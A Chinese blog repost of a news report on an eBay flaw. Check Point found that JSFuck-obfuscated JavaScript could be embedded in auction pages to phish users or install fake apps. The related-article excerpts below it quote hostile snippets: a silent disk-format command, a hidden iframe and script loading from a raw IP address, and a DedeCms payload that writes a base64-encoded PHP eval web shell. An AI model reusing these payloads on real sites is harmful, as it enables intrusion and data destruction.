eBay漏洞可让攻击者在拍卖页面嵌入恶意代码

最新推荐文章于 2018-09-28 02:36:12 发布
最新推荐文章于 2018-09-28 02:36:12 发布
阅读量119 收藏
点赞数
文章标签: javascript ViewUI
原文链接:https://yq.aliyun.com/articles/161285
版权

安全公司Check Point软件公司日前发现eBay网站存在安全漏洞能够允许攻击者使用网站钓鱼没有戒心用户或者感染他们的设备。目前掌握的信息,攻击者使用名为JSFUCK的编程技术,绕过eBay网站阻止用户从正在嵌入的JavaScript代码进入拍卖页面的核心限制,当这些页面在移动端或者桌面端浏览器打开之后就会执行这些代码。

通过上方的视频演示可以看到,某些人向移动用户发送了一条eBay网站链接,然后就会安装伪装成“折扣应用”的恶意软件。根据Check Point软件博文中写道,这种形式的漏洞在去年12月向eBay公司进行了提交,但是公司表示并没有计划来修复这个问题。

不过随后eBay向外媒Ars Technica表示,公司已经和安全公司Check Point进行了商谈,并根据这项发现部署各种安全筛选过滤器。此外市场上并未检测到任何利用该BUG漏洞进行恶意程序活动的迹象。

本文转自d1net(转载)

weixin_34318272
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
十七项网页恶意代码,别去害人啊!
domino的专栏
01-27 1万+
1、格式化硬盘 scr.Reset(); scr.Path="C://windows//Men?inicio//Programas//Inicio//automat.hta"; scr.Doc="wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Pl
Apache Flink 在 eBay 监控系统上的实践和应用
02-26
Apache Flink 在 eBay 的监控系统 Sherlock.IO 中扮演着至关重要的角色,每天处理海量的日志、事件和指标数据。...Flink的灵活性和可扩展性在eBay的应用中得到了充分展现,证明了其在监控领域的强大潜力。
很经典-网页恶意代码的现象及处理方法 [转载]
weixin_34383618的博客
08-18 418
这些都是自己或朋友平时遇到的问题,在解决处理过程中积累下来的,有些是翻书来的,有些是网上搜集来的,经过整理后和大家分享一下!~ (一).默认主页被修改   1.破坏特性:默认主页被自动改为某网站的网址。   2.表现形式:浏览器的默认主页被自动设为如www.********.com的网址。 3.清除方法:采用手动修改注册表法,开始菜单->运行->re...
网页设计的代码中被插入了恶意代码
weixin_33845477的博客
10-22 470
      一个非常奇怪的现象,在我电脑中所有的网页文件(html,asp,aspx等等)在最后几行都被加入了以下代码: <iframe src="http://222.208.183.246/htm/jh.htm" width="0" height="0" frameborder="0"></iframe> <script src="http:
前端安全系列(一):如何防止XSS攻击?
weixin_34356138的博客
09-28 780
前端安全 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要...
ApacheFlink在eBay监控系统上的实践和应用
02-24
Sherlock.IO是eBay现有的监控平台,每天要处理上百亿条日志、事件和指标。FlinkStreamingjob实时处理系统用于处理其中的日志和事件。本文将结合监控系统Flink的现状,具体讲述Flink在监控系统上的实践和应用,希望给...
可伸缩性最佳实践:来自eBay的经验
01-30
eBay,可伸缩性是我们每天奋力抵抗的一大架构压力。我们所做的每一项架构及设计决策,身前身后都能看到它的踪影。当我们面对的是全世界数以亿计的用户,每天的页面浏览量超过10亿,系统中的数据量要用皮字节(1015...
JustSnipe eBay拍卖狙击手「JustSnipe eBay Auction Sniper」-crx插件
03-21
JustSnipe是​​在线的eBay拍卖狙击手,可帮助您在eBay拍卖结束之前的最后一刻下单。借助我们的软件应用程序和功能强大的服务器,您可以随时设置目标项目,它只会为您提供目标信息。此扩展程序是我们在线Web服务中...
Rapidcatch eBay拍卖狙击手「Rapidcatch eBay auction sniper」-crx插件
03-10
此扩展允许通过Rapidcatch.com拍卖狙击手在eBay,Delcampe,Allegro页面从您的浏览器出价 这个扩展允许通过Rapidcatch.com竞价狙击手(https://rapidcatch.com)在eBay,Delcampe,Allegro页面从您的浏览器购物时...
网页恶意代码检测
热门推荐
kongls08的专栏
12-15 2万+
摘要 随着Internet技术的广泛应用,越来越多的信息资源通过Web服务共享。目前网页浏览是互联网上使用率最高的网络服务之一,也成为了恶意代码利用的有效传播途径。网页恶意代码逐渐成为危害面最广泛、传播效果最佳的恶意代码形式之一,对信息安全构成了严重的威胁。 网页恶意代码的检测方式包括:传统方法有人工检测、基于特征码的检测、启发式检测、基于行为的检测等,这些方法都有一些局限性,无法应对新技术下
防止网页被嵌入框架的代码
weixin_34279246的博客
06-07 151
最近,国内开始流行另一种流氓行为:使用框架(Frame),将你的网页嵌入它的网页中。 比如,有一家网站号称自己是"口碑聚合门户",提供全国各个网上论坛的精华内容。但是,其实它就是用框架抓取他人的网页,然后在上面加上自己的广告和站标,这同盗版书商有何不同?! 不明内情的访问者,只看到地址栏是该门户的URL,不知道真正内容部分的网页,其实来自另一个网站。 为...
网页恶意代码六大危害及其解决方案
luoye&guoguo
06-07 2772
      网页恶意代码(又称网页病毒)是利用网页来进行破坏的病毒,使用一些SCRIPT语言编写的一些恶意代码利用IE的漏洞来实现病毒植入。这是由于注册表HKEY_USERS.DEFAULTSoftwarePoliciesMicrosoftInternet ExplorerControl Panel下的DWORD值"homepage"的键值被修改的缘故。现在网络安全越来越引起人们的重视,我们先
Javascript和CSS的奇淫巧技
秋风吹渭水,落叶满长安
03-03 1130
昨天面试了eBay的前台工程师,发现这些家伙果然是很厉害,钻研还是很深的。对于我这种前后台都做过,但是都不是非常精通的人来说,还是很深刻的一堂课。因为他们钻得比较深,所以也就问了一些看似叼钻的问题,至少我这半掉子的人是没有见过。当然我并不认为这些东西有多种要,可以说是奇淫巧技,用来炫耀的。 JS如下代码: function Clazz(){    var _name = 'class
常见的网页恶意代码攻略
bluedusk
03-08 714
常见的网页恶意代码攻略 修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改 主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel   "Settings"=dword:1   HKEY_CURRENT_USER\...
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1214
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值